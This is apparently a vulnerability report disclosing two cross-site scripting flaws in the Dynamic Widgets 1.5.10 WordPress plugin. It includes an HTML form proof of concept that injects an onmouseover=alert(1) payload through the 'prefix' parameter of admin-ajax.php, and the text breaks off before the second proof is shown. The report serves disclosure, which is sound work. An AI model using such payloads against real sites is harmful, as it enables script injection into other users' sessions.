Hello,

Plugin: Dynamic Widgets 1.5.10 https://wordpress.org/plugins/dynamic-widgets/

1. Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can inject html/js code.

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=term_tree

Vulnerable parameters: prefix, widget_id

Example PHP callstack:

dynwid_term_tree   [/dynamic-widgets/dynamic-widgets.php:831]

DW_CustomPost::prtTax   [/dynamic-widgets/mods/custompost_module.php:278]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=term_tree">

<input type="text" name="id" value="1" />

<input type="text" name="widget_id" value="1" />

<input type="text" name="name" value="xxxxxxx" />

<input type="text" name="prefix" value='" onmouseover=alert(1) />' />

<input type="submit" />

</form>

--

2. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/themes.php?page=dynwid-config&page_limit=[xss]

Vulnerable parameter: page_limit

Example PHP callstack:

/dynamic-widgets/dynwid_admin_overview.php:146

Verification: